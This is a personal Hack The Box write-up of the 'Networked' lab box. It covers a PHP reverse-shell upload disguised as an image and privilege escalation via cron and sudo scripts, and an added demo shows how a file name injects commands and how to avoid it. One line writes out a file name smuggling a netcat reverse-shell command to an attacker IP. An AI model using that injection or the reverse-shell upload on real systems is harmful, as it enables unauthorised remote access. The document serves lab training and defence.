
Hack The Box — Networked Writeup without Metasploit

Networked: yes, I learnt to be patient with this box. Gave me a headache. Made so many mistakes. But then again, learnt a lot because of those stupid mistakes I was making. So here it goes. Nmap as usual.

Port 80 was open.

They are building something called facemash. Two people are funding it and there is a pool party. Let’s skip the pool party and check out what’s behind the scenes.

Upload and gallery are not linked, which means it’s up but not linked yet. Let’s ask gobuster to do its thing.

Web hacking is the worst nightmare for me. I hate it and don’t know much about it. Need to learn more about it. Anyway, checked out backup first because it might have some juicy stuff. Low-hanging fruit or something.

Downloaded the folder, extracted it and found a bunch of PHP files. Found upload and gallery.

After reading those files, got a PHP reverse shell. Modified it. To bypass the security check, had to insert an extra line into the file.

Now we need to upload the reverse shell, but before that have to rename the file. It has to be a jpg or png etc …

Annnnnd it’s uploaded. Time to check out the pool party pics. Set up the netcat listener so need to catch those pics HAHAHAH evil laugh.

We have a shell. I nearly lost my hair during the process from here on. Was hard. I don’t even know why the box was given an easy tag, or maybe I’m just too dumb to get it. Definitely can’t blame a noob. Since we have a shell, need to check for the user flag.

Who am I kidding, right? I’m an apache user trying to access a user called guly. I just hope he is not the pink hat guy. Now we need to read the check attack file and also check out the crontab.guly. First thing I did was check out the crontab.

OK, so every 3 minutes it runs the check_attack.php file. Let’s read the check_attack file.

All it does is delete files from the location, and it also requires lib.php, which we downloaded earlier. It sends a mail to guly. Let’s check if we can make a file in /var/www/html/uploads/, but before that let’s see if there is anything interesting with sudo -l.

What’s wrong with this guy? Seriously? I was getting pissed. Bunch of codes and can’t even view this?

Created a shell script called bash.sh and ran the file: php -f /home/guly/check_attack.php

It deleted the bash script which was created. We can’t inject code into those scripts. We don’t have the rights to do so. Started to read the code again. Read it a few more times, trying to understand the code. Started reading stuff online and found a solution to it.

Had to run a command like this: touch '; nc -c bash 10.10.14.4 4443' in /var/www/html/uploads/. Since I’m a noob and an honest noob, I took it from someone else’s writeup. Accidentally closed that page. Whoever it was, I’m grateful to him for solving that problem. And in my defense, you’re allowed to search the internet while doing OSCP.

I did that and, because of my curiosity and stupidity, I ran the attacker file like before, which again gave a limited shell like the previous one. I spent more than half an hour trying to figure out what went wrong.

Finally figured out that it has to run on its own. Had to wait 3 minutes for it to run and not force it. What is wrong with me, right?
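Why a file name alone was enough, as an added example that is not from the original post: the post does not show check_attack.php, so this assumes the cron job builds its delete command as a shell string containing each file name. A harmless marker (touch INJECTED, constructed) stands in for the command, and cleanup_unsafe, cleanup_safe and run_demo are hypothetical names.

```shell
#!/bin/sh
# Constructed demo: a cleanup job that deletes every file in an upload
# directory. Directory layout and file names are made up for this example.

# Unsafe: the name is pasted into a string that a shell then parses, so a
# ';' in the name ends the rm command and starts a second command.
cleanup_unsafe() {
    dir=$1
    for path in "$dir"/*; do
        name=${path##*/}
        sh -c "rm -f $dir/$name" >/dev/null 2>&1 || true
    done
}

# Safe: the path reaches rm as a single argument and is never re-parsed;
# '--' stops a name starting with '-' from being read as an option.
cleanup_safe() {
    dir=$1
    for path in "$dir"/*; do
        [ -e "$path" ] || continue
        rm -f -- "$path"
    done
}

# Run one variant against a fresh directory holding a file whose name carries
# a harmless marker command; print "<injected|clean> <files left>".
run_demo() {
    variant=$1
    work=$(mktemp -d)
    mkdir "$work/uploads"
    : > "$work/uploads/; touch INJECTED"
    (cd "$work" && "$variant" "$work/uploads")
    if [ -e "$work/INJECTED" ]; then result=injected; else result=clean; fi
    left=$(ls -A "$work/uploads" | wc -l | tr -d ' ')
    rm -rf -- "$work"
    echo "$result $left"
}

run_demo cleanup_unsafe   # prints: injected 1
run_demo cleanup_safe     # prints: clean 0
```

In PHP the same fix is to delete with unlink() on the path rather than through a shell, or to wrap the name in escapeshellarg() when a shell call cannot be avoided.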

Finally got guly user. Now let’s run sudo -l.

There is a changename script which can be run as root without a password. That made me happy. NOPASSWD, such a wonderful thing.

Wonderful thing didn’t last long. Can’t write to that file. New chapter of sadness starts. Checked out the content of changename.sh.

I guess that’s basically a network script. Let’s run it.

It needed input. Time to experiment. It did give a shell, but it’s the same user. So it kind of worked but didn’t work. Started doing more experiments.

I couldn’t handle it anymore, spawned a shell which looks way better, and did more experiments.

And that did the trick. Later on found out there was a flaw about some white space.
